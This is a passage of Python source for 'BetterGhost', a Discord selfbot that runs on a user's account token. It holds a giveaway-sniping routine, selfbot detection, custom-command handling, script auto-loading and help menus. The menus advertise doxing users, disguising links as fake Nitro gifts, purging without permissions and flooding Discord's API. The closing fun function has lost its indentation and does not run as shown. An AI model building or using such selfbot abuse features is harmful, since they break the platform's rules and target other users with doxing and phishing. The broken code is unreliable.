                                        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                                        embed.set_timestamp()
                                        webhook.add_embed(embed)
                                        response = webhook.execute()
                                    # if __giveawaysniperui__ == True:
                                    #     def giveawayGUI():
                                    #         giveawayUi = tkinter.Tk()
                                    #         giveawayUi.attributes('-topmost', True)
                                    #         def addReactionForGiveaway():
                                    #             requests.put(f"https://discord.com/api/channels/{message.channel.id}/messages/{message.id}/reactions/%F0%9F%8E%89/@me", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
                                    #         def closeGui():
                                    #             giveawayUi.destroy()
                                    #         def joinGiveaway():
                                    #             print(f"{printSpaces} {fg.cYellow}Joined giveaway!")
                                    #             addReactionForGiveaway()
                                    #             closeGui()
                                    #         giveawayUi.wm_title("Giveaway UI")
                                    #         windowWidth = giveawayUi.winfo_reqwidth()
                                    #         windowHeight = giveawayUi.winfo_reqheight()
                                    #         positionRight = int(giveawayUi.winfo_screenwidth()/2 - windowWidth/2)
                                    #         positionDown = int(giveawayUi.winfo_screenheight()/2 - windowHeight/2)
                                    #         giveawayUi.geometry("+{}+{}".format(positionRight, positionDown))
                                    #         tkinter.Label(giveawayUi, text=" ").pack()
                                    #         mainLabel = tkinter.Label(giveawayUi, text="Would you like to join a giveaway for").pack()
                                    #         prizeLabel = tkinter.Label(giveawayUi, text=prize).pack()
                                    #         tkinter.Label(giveawayUi, text=" ").pack()
                                    #         joinBtn = tkinter.Button(giveawayUi, text="Join", command=joinGiveaway, width=15, height=2, bg="green", fg="white").pack(side=tkinter.constants.LEFT)
                                    #         cancelBtn = tkinter.Button(giveawayUi, text="Cancel", command=closeGui, width=15, height=2, bg="red", fg="white").pack(side=tkinter.constants.LEFT)
                                    #         giveawayUi.mainloop()
                                    #     giveawayGUI()
                                    #     if Config.getConfig()["sounds"]:
                                    #         if str(sounddevice.query_devices()) != "":
                                    #             pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                                    #             pygame.mixer.music.play(1)
                                    #     send_notification("Giveaway Sniper", f"Sniped a giveaway for {prize}.", 10)
                                    #     if __giveawaywebhook__ != "":
                                    #         webhook = DiscordWebhook(url=__giveawaywebhook__)
                                    #         embed = DiscordEmbed(title='Giveaway Sniper', description=f"Joined a giveaway for `{prize}` after pressing join in Giveaway UI.", color=__embedcolourraw__[1:])
                                    #         embed.set_thumbnail(url=__embedimage__)
                                    #         embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                                    #         embed.set_timestamp()
                                    #         embed.add_embed_field(name='Prize', value=prize, inline=False)
                                    #         embed.add_embed_field(name='Joined After', value=f"Pressing join in Giveaway UI.", inline=False)
                                    #         embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
                                    #         webhook.add_embed(embed)
                                    #         response = webhook.execute()
                                    # else:
                                    # NOTE(review): commenting out the UI branch above left these
                                    # sound/notification calls unconditional (they bypass the
                                    # "sounds" config check used everywhere else) — confirm intent.
                                    pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                                    pygame.mixer.music.play(1)
                                    send_notification("Giveaway Sniper", f"Sniped a giveaway for {prize}.", 10)
                                    # Wait a configurable delay, then join by reacting with the
                                    # emoji this giveaway bot expects.
                                    await asyncio.sleep(__giveawayjoindelay__)
                                    emoji = GIVEAWAYBOTS[str(message.author.id)]
                                    await message.add_reaction(emoji)
                                    if __giveawaywebhook__ != "":
                                        webhook = DiscordWebhook(url=__giveawaywebhook__)
                                        embed = DiscordEmbed(title='Giveaway Sniper', description=f"Joined a giveaway for `{prize}` after `{__giveawayjoindelay__}` seconds.", color=__embedcolourraw__[1:])
                                        embed.set_thumbnail(url=__embedimage__)
                                        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                                        embed.set_timestamp()
                                        webhook.add_embed(embed)
                                        response = webhook.execute()
                                    print_sniper("Giveaway")
                                    print_sniper_info("Prize", prize)
                                    try:
                                        print_sniper_info("Server", message.guild.name)
                                    except:
                                        pass
                                    try:
                                        print_sniper_info("Channel", message.channel.name)
                                    except:
                                        pass
                                    print_sniper_info("Joined after", f"{__giveawayjoindelay__} seconds.")
                                    send_notification("Giveaway Sniper", f"Joined a giveaway for {prize}.", 10)
                                    pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                                    pygame.mixer.music.play(1)
            # if "congratulations" in message.content.lower():
            #     if f"<@{BetterGhost.user.id}>" in message.content.lower():
            #         prize = message.content.split("!")[1].split("**")[1]
            #         print_sniper("Giveaway")
            #         print(f"       {fg.cYellow}You won!!!")
            #         print_sniper_info("Prize", prize)
            #         try:
            #             print_sniper_info("Server", message.guild.name)
            #         except:
            #             pass
            #         try:
            #             print_sniper_info("Channel", message.channel.name)
            #         except:
            #             pass
            #         if __giveawaywebhook__ != "":
            #             webhook = DiscordWebhook(url=__giveawaywebhook__)
            #             embed = DiscordEmbed(title='Giveaway Sniper', description=f"You won a giveaway for `{prize}`!", color=__embedcolourraw__[1:])
            #             embed.set_thumbnail(url=__embedimage__)
            #             embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            #             embed.set_timestamp()
            #             webhook.add_embed(embed)
            #             response = webhook.execute()
            #         send_notification("Giveaway Sniper", f"You won a giveaway for {prize} 🎉!", 10)
            #         if Config.getConfig()["sounds"]:
            #             if str(sounddevice.query_devices()) != "":
            #                 pygame.mixer.music.load(resource_path("sounds/giveaway-win.mp3"))
            #                 pygame.mixer.music.play(1)
            # --- Selfbot detection: non-bot accounts cannot normally send embeds ---
            if Config.getConfig()["detections"]["selfbot"]:
                if not message.author.bot:
                    if message.embeds:
                        if "http" not in message.content:  # links can legitimately auto-embed
                            if message.guild.id not in __ignoredservers__["selfbots"]:
                                print_detect("Selfbot")
                                print_sniper_info("Author", message.author)
                                try:
                                    print_sniper_info("Server", message.guild.name)
                                except:
                                    pass
                                try:
                                    print_sniper_info("Channel", message.channel.name)
                                except:
                                    pass
                                print_sniper_info("Reason", "Sent an embedded message.")
                                if __selfbotwebhook__ != "":
                                    webhook = DiscordWebhook(url=__selfbotwebhook__)
                                    embed = DiscordEmbed(title='Selfbot', color=__embedcolourraw__[1:])
                                    embed.set_thumbnail(url=__embedimage__)
                                    embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                                    embed.set_timestamp()
                                    embed.add_embed_field(name='Author', value=str(message.author), inline=False)
                                    try:
                                        embed.add_embed_field(name='Server', value=str(message.guild.name), inline=False)
                                    except:
                                        pass
                                    try:
                                        embed.add_embed_field(name='Channel', value=str(message.channel.name), inline=False)
                                    except:
                                        pass
                                    embed.add_embed_field(name='Reason', value="Sent an embedded message.", inline=False)
                                    webhook.add_embed(embed)
                                    response = webhook.execute()
        if message.author.id == BetterGhost.user.id:
            # --- User-defined commands, reloaded from disk on every own message ---
            ccmd = json.load(open("customcommands.json"))
            for key in ccmd:
                cmd = key
                response = ccmd[key]
                if message.content == f"{__prefix__}{cmd}":
                    print_cmd(f"{cmd}")
                    try:
                        await message.delete()
                    except:
                        pass
                    # Substitute the supported template placeholders.
                    response = response.replace("{currenttime}", str(datetime.now().strftime("%H:%M:%S")))
                    response = response.replace("{currentdate}", str(datetime.now().strftime("%d/%m/%Y")))
                    response = response.replace("{version}", str(version))
                    response = response.replace("{prefix}", str(__prefix__))
                    response = response.replace("{theme}", str(__theme__))
                    response = response.replace("{randomint}", str(random.randint(1000, 9999)))
                    response = response.replace("{randomstring}", str(''.join(random.choice(string.ascii_letters) for i in range(8))))
                    await message.channel.send(response)
            # --- Uwuify: rewrite our own non-command messages ---
            if (uwuifyEnabled):
                if (not message.content.startswith(__prefix__) or message.content == "" or message.content == None):
                    uwuedMessage = uwuify.uwu(message.content)
                    await message.edit(content=uwuedMessage)
            #print(str(message.author) + " : " + str(message.content))
        await BetterGhost.process_commands(message)
# Auto-load every Python script in scripts/ as an extension.
# Fix: the loop previously called include(f'scripts/(unknown)') — a literal
# "(unknown)" path — for every entry, so no script was ever loaded; pass the
# actual file name instead.
for filename in os.listdir('scripts/'):
    if filename.endswith('.py'):
        include(f'scripts/{filename}')
@BetterGhost.command(name="scripts", description="Display all custom scripts.", usage="scripts", aliases=["customscripts"])
async def scripts(ctx):
    """List the custom scripts found in scripts/ (shown without the .py suffix)."""
    entries = os.listdir('scripts/')
    totalscripts = len(entries)  # counts every directory entry, matching original behavior
    text = "".join(f"{entry.replace('.py', '')}\n" for entry in entries if entry.endswith('.py'))
    if __embedmode__:
        embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", description=f"Found {totalscripts} custom scripts", color=__embedcolour__)
        embed.add_field(name="Scripts", value=text)
        embed.set_author(name="Custom Scripts")
        embed.set_thumbnail(url=__embedimage__)
        embed.set_image(url=__embedlargeimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"""```ini
[ Custom Scripts ]
Found {totalscripts} custom scripts
{text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="customcommands", description="Display all custom commands.", usage="customcommands", aliases=["ccmds"])
async def customcommands(ctx):
    """Display every user-defined command from customcommands.json.

    Fix: loads the JSON on each call (with a context manager so the file
    handle is always closed) instead of relying on a ``ccmd`` global that is
    only populated inside the on_message handler; this also shows commands
    added since startup.
    """
    with open("customcommands.json") as ccmd_file:
        ccmd = json.load(ccmd_file)
    totalcmds = len(ccmd)
    ccmd2 = ""
    for cmd in ccmd:
        ccmd2 = ccmd2 + f"{__prefix__}{cmd}\n"
    if __embedmode__:
        embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"Found {totalcmds} custom commands.")
        embed.add_field(name="Commands", value=ccmd2)
        embed.set_author(name="Custom Commands")
        embed.set_thumbnail(url=__embedimage__)
        embed.set_image(url=__embedlargeimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"""```ini
[ Custom Commands ]
Found {totalcmds} custom commands.
{ccmd2}
{__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="allcmds", description="Print a list of all the commands.", usage="allcmds", aliases=["features"])
async def allcmds(ctx):
    """Dump usage/description of every registered command to data/features.txt
    and open it in Notepad.

    Fix: the file is now written through a ``with`` block, guaranteeing it is
    flushed and closed before Notepad opens it (the original left the handle
    open).
    """
    await ctx.message.delete()
    totalCommands = len(BetterGhost.commands)
    content = "".join(f"{command.usage} : {command.description}\n" for command in BetterGhost.commands)
    with open("data/features.txt", "w") as file:
        file.write(f"[All Commands]\nTotal Commands: {totalCommands}\n \n" + content)
    os.system("notepad data/features.txt")  # Windows-only viewer
@BetterGhost.command(name="search", description="Search for commands.", usage="search [term]")
async def search(ctx, *, command = None):
    """Search command names, descriptions, and aliases for *command*.

    With no argument, prompts for a search term. Results go out as an embed
    or an ini code block depending on __embedmode__; if sending fails (e.g.
    the result text exceeds Discord's message length limit), the results are
    printed to the console instead.

    Fix: the fallback handler used a bare ``except:`` which also swallowed
    KeyboardInterrupt/SystemExit; narrowed to ``except Exception:``.
    """
    if command is None:
        if __embedmode__:
            embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description="Please enter a command to search for.")
            embed.set_author(name="Search")
            embed.set_thumbnail(url=__embedimage__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.set_image(url=__embedlargeimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed, delete_after=__deletetimeout__)
        else:
            await ctx.send(f"""```ini
[ Search ]
Please enter a command to search for.
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
    else:
        text = ""
        text2 = ""
        searchedItems = 0
        for cmd in BetterGhost.commands:
            # Substring match on name/description; exact membership in the alias list.
            if command in cmd.name or command in cmd.description or command in cmd.aliases:
                searchedItems += 1
                text += f"`{BetterGhost.command_prefix}`**{cmd.usage}** » {cmd.description}\n"
                text2 += f"{BetterGhost.command_prefix}{cmd.usage} » {cmd.description}\n"
        try:
            if __embedmode__:
                embed = discord.Embed(title="Search results...", description=f"Found `{searchedItems}` items for `{command}`.\n\n{text}", color=__embedcolour__)
                embed.set_thumbnail(url=__embedimage__)
                embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                embed.set_image(url=__embedlargeimage__)
                embed.timestamp = datetime.now()
                await ctx.send(embed=embed, delete_after=__deletetimeout__)
            else:
                await ctx.send(f"""```ini
[ Searched for {command} ]
{text2}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
        except Exception:
            # Sending the full results failed (most likely message too long):
            # point the user at the console and print them there instead.
            if __embedmode__:
                embed = discord.Embed(title="Check console for search results", color=__embedcolour__)
                embed.set_thumbnail(url=__embedimage__)
                embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                embed.set_image(url=__embedlargeimage__)
                embed.timestamp = datetime.now()
                await ctx.send(embed=embed, delete_after=__deletetimeout__)
            else:
                await ctx.send(f"""```ini
[ Check console for search results ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
            print(f"[ Search results for {command} ]\n{text2}")
@BetterGhost.command(name="help", description="The help command.", usage="help (command)", aliases=["cmds", "commands"])
async def help(ctx, *, command = None):
    """Show the command-category index, or detailed help for one command.

    Fix: when a command had no aliases, the placeholder "No aliases" was
    appended to ``cmd.aliases`` itself, permanently mutating the shared
    Command object (the fake alias then matched alias lookups elsewhere,
    e.g. in ``search``). A local display string is used instead.
    """
    totalcmds = len(BetterGhost.commands)-len(scriptsList)  # exclude loaded scripts from the count
    if command is None:
        if __embedmode__:
            embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
Arguments in `[]` are required, arguments in `()` are optional.
`{BetterGhost.command_prefix}`**text (page 1/2)** » Text commands.
`{BetterGhost.command_prefix}`**fun (page 1)** » Fun commands.
`{BetterGhost.command_prefix}`**image (page 1)** » Image commands.
`{BetterGhost.command_prefix}`**moderation (page 1)** » Moderation commands.
`{BetterGhost.command_prefix}`**info (page 1)** » Info commands.
`{BetterGhost.command_prefix}`**user (page 1)** » User commands.
`{BetterGhost.command_prefix}`**selfbot (page 1)** » Selfbot commands.
`{BetterGhost.command_prefix}`**webhook (page 1)** » Webhook commands.
`{BetterGhost.command_prefix}`**abuse (page 1)** » Abuse commands.
`{BetterGhost.command_prefix}`**themes (page 1)** » Theme commands.
`{BetterGhost.command_prefix}`**giveaway (page 1)** » Giveaway commands.
`{BetterGhost.command_prefix}`**nsfw (page 1)** » NSFW commands.
`{BetterGhost.command_prefix}`**proxy (page 1)** » Proxy commands.
`{BetterGhost.command_prefix}`**tools (page 1)** » Discord and other tools.
`{BetterGhost.command_prefix}`**customcommands** » Your custom commands.
`{BetterGhost.command_prefix}`**customscripts** » Your scripts.
`{BetterGhost.command_prefix}`**search [term]** » Search for a command.
`{BetterGhost.command_prefix}`**help (command)** » Help for a specific command.
There is a total of `{totalcmds}` commands.
""")
            embed.set_author(name="All Commands")
            embed.set_image(url=__embedlargeimage__)
            embed.set_thumbnail(url=__embedimage__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed, delete_after=__deletetimeout__)
        else:
            await ctx.send(f"""```ini
[ {__embedtitle__} ]
Arguments in [] are required, arguments in () are optional.
{BetterGhost.command_prefix}text (page 1/2) » Text commands.
{BetterGhost.command_prefix}fun (page 1) » Fun commands.
{BetterGhost.command_prefix}image (page 1) » Image commands.
{BetterGhost.command_prefix}moderation (page 1) » Moderation commands.
{BetterGhost.command_prefix}info (page 1) » Info commands.
{BetterGhost.command_prefix}user (page 1) » User commands.
{BetterGhost.command_prefix}selfbot (page 1) » Selfbot commands.
{BetterGhost.command_prefix}webhook (page 1) » Webhook commands.
{BetterGhost.command_prefix}abuse (page 1) » Abuse commands.
{BetterGhost.command_prefix}themes (page 1) » Theme commands.
{BetterGhost.command_prefix}giveaway (page 1) » Giveaway commands.
{BetterGhost.command_prefix}nsfw (page 1) » NSFW commands.
{BetterGhost.command_prefix}proxy (page 1) » Proxy commands.
{BetterGhost.command_prefix}tools (page 1) » Discord and other tools.
{BetterGhost.command_prefix}customcommands » Your custom commands.
{BetterGhost.command_prefix}customscripts » Your scripts.
{BetterGhost.command_prefix}search [term] » Search for a command.
{BetterGhost.command_prefix}help (command) » Help for a specific command.
There is a total of {totalcmds} commands.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
    else:
        for cmd in BetterGhost.commands:
            if command == cmd.name or command in cmd.aliases:
                # Build the alias display WITHOUT mutating cmd.aliases.
                alias_text = ', '.join(cmd.aliases) if cmd.aliases else "No aliases"
                if __embedmode__:
                    embed = discord.Embed(title=f"{cmd.name}", color=__embedcolour__)
                    embed.add_field(name="Usage", value=f"{cmd.usage}", inline=False)
                    embed.add_field(name="Description", value=f"{cmd.description}", inline=False)
                    embed.add_field(name="Aliases", value=alias_text)
                    embed.set_thumbnail(url=__embedimage__)
                    embed.set_image(url=__embedlargeimage__)
                    embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                    embed.timestamp = datetime.now()
                    await ctx.send(embed=embed, delete_after=__deletetimeout__)
                else:
                    await ctx.send(f"""```ini
[ {cmd.name} ]
Usage: {cmd.usage}
Description: {cmd.description}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="themes", description="Theme related commands.", usage="themes")
async def themes(ctx):
    """Show the active theme, the other installed themes, and the theme commands."""
    json_themes = [entry for entry in os.listdir("themes") if entry.endswith(".json")]
    installed = "".join(entry.replace(".json", "") + "\n" for entry in json_themes)
    if __embedmode__:
        embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__)
        embed.add_field(name="Current Theme", value=f"{__theme__}", inline=False)
        embed.add_field(name="Other Themes", value=f"{installed}", inline=False)
        embed.add_field(name="Commands", value=f"`{BetterGhost.command_prefix}`**newtheme [name]** » Create a new theme with the given name.\n`{BetterGhost.command_prefix}`**deltheme [name]** » Delete the named theme.\n`{BetterGhost.command_prefix}`**theme [theme]** » Change your current theme.\n`{BetterGhost.command_prefix}`**ctheme** » Community themes.", inline=False)
        embed.set_author(name="Theme Commands")
        embed.set_thumbnail(url=__embedimage__)
        embed.set_image(url=__embedlargeimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"""```ini
[ Theme Commands ]
Current Theme: {__theme__}
[ Other Themes ]
{installed}
[ Commands ]
{BetterGhost.command_prefix}newtheme [name] » Create a new theme with the given name.
{BetterGhost.command_prefix}deltheme [name] » Delete the named theme.
{BetterGhost.command_prefix}theme [theme] » Change your current theme.
{BetterGhost.command_prefix}cthemes » Community themes.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="ctheme", description="Community themes.", usage="ctheme", aliases=["communitythemes", "cloudthemes", "cthemes"])
async def ctheme(ctx, *, dl = None):
    """List the community themes, or download one by name into themes/.

    Fix: the downloaded theme is now written through a ``with`` block so the
    file handle is guaranteed to be closed (the original used
    ``open(...).write(...)`` and leaked the handle).
    NOTE(review): an unrecognised theme name fails silently, and the HTTP
    requests have no timeout — confirm both are intentional.
    """
    if dl is None:
        url = "https://raw.githubusercontent.com/BetterGhostSelfbot/Community-Themes/main/themes.txt"
        themes = requests.get(url).text.split("\n")
        if __embedmode__:
            embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", description=f"Community Themes, run `{BetterGhost.command_prefix}ctheme (theme name)` to download the theme.\n ", color=__embedcolour__)
            embed.add_field(name="Theme List", value='\n'.join(themes))
            embed.set_author(name="Community Themes")
            embed.set_thumbnail(url=__embedimage__)
            embed.set_image(url=__embedlargeimage__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed, delete_after=__deletetimeout__)
        else:
            await ctx.send(f"""```ini
[ Community Themes ]
Community Themes, run {BetterGhost.command_prefix}ctheme (theme name) to download the theme.
[ Theme List ]
{themes}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
    else:
        request = requests.get("https://raw.githubusercontent.com/BetterGhostSelfbot/Community-Themes/main/themes.txt")
        # Strip Windows line endings from the remote index before matching.
        themes = [line.replace("\r", "") for line in request.text.split("\n")]
        if dl in themes:
            url = f'https://raw.githubusercontent.com/BetterGhostSelfbot/Community-Themes/main/{dl}.json'
            data = requests.get(url, allow_redirects=True)
            with open(f'themes/{dl}.json', 'wb') as theme_file:
                theme_file.write(data.content)
            if __embedmode__:
                embed = discord.Embed(title="Theme downloaded successfully", color=__embedcolour__)
                embed.set_thumbnail(url=__embedimage__)
                embed.set_image(url=__embedlargeimage__)
                embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                embed.timestamp = datetime.now()
                await ctx.send(embed=embed, delete_after=__deletetimeout__)
            else:
                await ctx.send(f"""```ini
[ Theme downloaded successfully ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="text", description="Text related commands.", usage="text (page)")
async def text(ctx, page:int = 1):
    """Send the two-page help listing for the text-formatting commands.

    page selects which half of the listing is shown; any value other than
    1 or 2 sends nothing.
    """
    if __embedmode__:
        if page == 1:
            embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**js [message]** » Send all your messages in a JavaScript code block.
`{BetterGhost.command_prefix}`**lua [message]** » Send all your messages in a Lua code block.
`{BetterGhost.command_prefix}`**php [message]** » Send all your messages in a PHP code block.
`{BetterGhost.command_prefix}`**html [message]** » Send all your messages in a HTML code block.
`{BetterGhost.command_prefix}`**css [message]** » Send all your messages in a CSS code block.
`{BetterGhost.command_prefix}`**yaml [message]** » Send all your messages in a YAML code block.
`{BetterGhost.command_prefix}`**json [message]** » Send all your messages in a JSON code block.
`{BetterGhost.command_prefix}`**cpp [message]** » Send all your messages in a C++ code block.
`{BetterGhost.command_prefix}`**cs [message]** » Send all your messages in a C# code block.
`{BetterGhost.command_prefix}`**java [message]** » Send all your messages in a Java code block.
`{BetterGhost.command_prefix}`**python [message]** » Send all your messages in a Python code block.
`{BetterGhost.command_prefix}`**secret [message]** » Send all your messages in a secret block.
`{BetterGhost.command_prefix}`**secretletters [message]** » Put all lettes from your message into separate secret blocks
`{BetterGhost.command_prefix}`**regional [message]** » Replace all letters with emoji.
`{BetterGhost.command_prefix}`**bold [message]** » Send all your messages in bold.
`{BetterGhost.command_prefix}`**italic [message]** » Send all your messages in italics.
""")
            embed.set_author(name="Text Commands (1/2)")
            embed.set_thumbnail(url=__embedimage__)
            embed.set_image(url=__embedlargeimage__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed, delete_after=__deletetimeout__)
        elif page == 2:
            embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**rembed (delay) [title]** » Kill Discord's API with a sexy rainbow embedded message.
`{BetterGhost.command_prefix}`**cembed [title] [description] [colour]** » Create a custom embedded message.
`{BetterGhost.command_prefix}`**embed [title]** » Create an embedded message.
`{BetterGhost.command_prefix}`**suggest [suggestion]** » Suggest something.
`{BetterGhost.command_prefix}`**privatemsg [message]** » Send an encrypted message.
`{BetterGhost.command_prefix}`**privatemsgdecode [message]** » Decode an encrypted message.
`{BetterGhost.command_prefix}`**blank** » Send a blank message
`{BetterGhost.command_prefix}`**length [string]** » Get the length of a string.
`{BetterGhost.command_prefix}`**chatbypass [text]** » Bypass chat language restrictions.
`{BetterGhost.command_prefix}`**shrug** » Shrug your arms.
`{BetterGhost.command_prefix}`**tableflip** » Flip the table.
`{BetterGhost.command_prefix}`**unflip** » Put the table back.
`{BetterGhost.command_prefix}`**lmgtfy [search]** » Let me Google that for you.
`{BetterGhost.command_prefix}`**typing [start/stop]** » Start or stop typing.
`{BetterGhost.command_prefix}`**aesthetic [text]** » Send your text s p a c e d out.
`{BetterGhost.command_prefix}`**lowercase [msg]** » Send your message in lowercase.
`{BetterGhost.command_prefix}`**uppercase [msg]** » Send your message in uppercase.
`{BetterGhost.command_prefix}`**sentencecase [msg]** » Send your messages in sentence case.
`{BetterGhost.command_prefix}`**ascii [text]** » Send your message in ascii.
`{BetterGhost.command_prefix}`**zalgo [text]** » Unleash the zalgo into your message.
`{BetterGhost.command_prefix}`**leet [text]** » Turn your text into 1337 text.
`{BetterGhost.command_prefix}`**fakeedited [message]** » "Edit" a message.
""")
            embed.set_author(name="Text Commands (2/2)")
            embed.set_thumbnail(url=__embedimage__)
            embed.set_image(url=__embedlargeimage__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed, delete_after=__deletetimeout__)
        else:
            # Unknown page number: silently do nothing.
            pass
    else:
        if page == 1:
            await ctx.send(f"""```ini
[ Text Commands (1/2) ]
{BetterGhost.command_prefix}js [message] » Send all your messages in a JavaScript code block.
{BetterGhost.command_prefix}lua [message] » Send all your messages in a Lua code block.
{BetterGhost.command_prefix}php [message] » Send all your messages in a PHP code block.
{BetterGhost.command_prefix}html [message] » Send all your messages in a HTML code block.
{BetterGhost.command_prefix}css [message] » Send all your messages in a CSS code block.
{BetterGhost.command_prefix}yaml [message] » Send all your messages in a YAML code block.
{BetterGhost.command_prefix}json [message] » Send all your messages in a JSON code block.
{BetterGhost.command_prefix}cpp [message] » Send all your messages in a C++ code block.
{BetterGhost.command_prefix}cs [message] » Send all your messages in a C# code block.
{BetterGhost.command_prefix}java [message] » Send all your messages in a Java code block.
{BetterGhost.command_prefix}python [message] » Send all your messages in a Python code block.
{BetterGhost.command_prefix}secret [message] » Send all your messages in a secret block.
{BetterGhost.command_prefix}secretletters [message] » Put all lettes from your message into separate secret blocks
{BetterGhost.command_prefix}regional [message] » Replace all letters with emoji.
{BetterGhost.command_prefix}bold [message] » Send all your messages in bold.
{BetterGhost.command_prefix}italic [message] » Send all your messages in italics.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
        elif page == 2:
            await ctx.send(f"""```ini
[ Text Commands (2/2) ]
{BetterGhost.command_prefix}rembed (delay) [title] » Kill Discord's API with a sexy rainbow embedded message.
{BetterGhost.command_prefix}cembed [title] [description] [colour] » Create a custom embedded message.
{BetterGhost.command_prefix}embed [title] » Create an embedded message.
{BetterGhost.command_prefix}suggest [suggestion] » Suggest something.
{BetterGhost.command_prefix}privatemsg [message] » Send an encrypted message.
{BetterGhost.command_prefix}privatemsgdecode [message] » Decode an encrypted message.
{BetterGhost.command_prefix}blank » Send a blank message
{BetterGhost.command_prefix}length [string] » Get the length of a string.
{BetterGhost.command_prefix}chatbypass [text] » Bypass chat language restrictions.
{BetterGhost.command_prefix}shrug » Shrug your arms.
{BetterGhost.command_prefix}tableflip » Flip the table.
{BetterGhost.command_prefix}unflip » Put the table back.
{BetterGhost.command_prefix}lmgtfy [search] » Let me Google that for you.
{BetterGhost.command_prefix}typing [start/stop] » Start or stop typing.
{BetterGhost.command_prefix}aesthetic [text] » Send your text s p a c e d out.
{BetterGhost.command_prefix}lowercase [msg] » Send your message in lowercase.
{BetterGhost.command_prefix}uppercase [msg] » Send your message in uppercase.
{BetterGhost.command_prefix}sentencecase [msg] » Send your messages in sentence case.
{BetterGhost.command_prefix}ascii [text] » Send your message in ascii.
{BetterGhost.command_prefix}zalgo [text] » Unleash the zalgo into your message.
{BetterGhost.command_prefix}leet [text] » Turn your text into 1337 text.
{BetterGhost.command_prefix}fakeedited [message] » "Edit" a message.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="fun", description="Fun related commands.", usage="fun")
async def fun(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**slots** » Play the slot machine.
`{BetterGhost.command_prefix}`**yomomma** » Random yo momma joke.
`{BetterGhost.command_prefix}`**socialcredit [@user]** » A users social credit score.
`{BetterGhost.command_prefix}`**roast [@user]** » Roast a user.
`{BetterGhost.command_prefix}`**howgay [@user]** » How gay a user is.
`{BetterGhost.command_prefix}`**howskid [@user]** » Check the percentage of a skid.
`{BetterGhost.command_prefix}`**iq [@user]** » Check how smart a user is.
`{BetterGhost.command_prefix}`**pp [@user]** » The length of a user's penis.
`{BetterGhost.command_prefix}`**rainbowrole [@role]** » Kill Discord's API with a sexy rainbow role.
`{BetterGhost.command_prefix}`**coinflip** » Flip a coin.
`{BetterGhost.command_prefix}`**dice** » Roll a dice.
`{BetterGhost.command_prefix}`**8ball [question]** » Ask the magic eight ball a question.
`{BetterGhost.command_prefix}`**choice [choice1] [choice2]** » Pick a random choice.
`{BetterGhost.command_prefix}`**dox [@user]** » Dox the mentioned user.
`{BetterGhost.command_prefix}`**fakenitro [url]** » Hide a link in a nitro URL.
`{BetterGhost.command_prefix}`**purgehack** » Purge without permissions.
`{BetterGhost.command_prefix}`**dadjoke** » A random dad joke.
`{BetterGhost.command_prefix}`**randommessage** » A random message.
`{BetterGhost.command_prefix}`**randomquestion** » A random question.
`{BetterGhost.command_prefix}`**rickroll** » Send never gonna give you up lyrics one by one.
